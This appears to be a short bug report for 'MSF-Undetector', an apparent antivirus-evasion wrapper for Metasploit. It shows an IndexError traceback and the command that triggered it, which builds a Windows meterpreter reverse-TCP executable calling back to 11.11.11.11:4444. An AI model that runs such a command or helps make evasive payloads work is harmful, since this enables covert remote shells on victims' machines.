MSF-Undetector
MSF-Undetector copied to clipboard
IndexError: list index out of range
Here is the input:
python msfud.py -p windows/meterpreter/reverse_tcp -a 11.11.11.11 -l 4444 -o msfudd.exe
And here is the output :
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Traceback (most recent call last):
File "msfud.py", line 20, in <module>
firstbase64 = re.findall(r"'(.*?)'", tmp, re.DOTALL)[1]
IndexError: list index out of range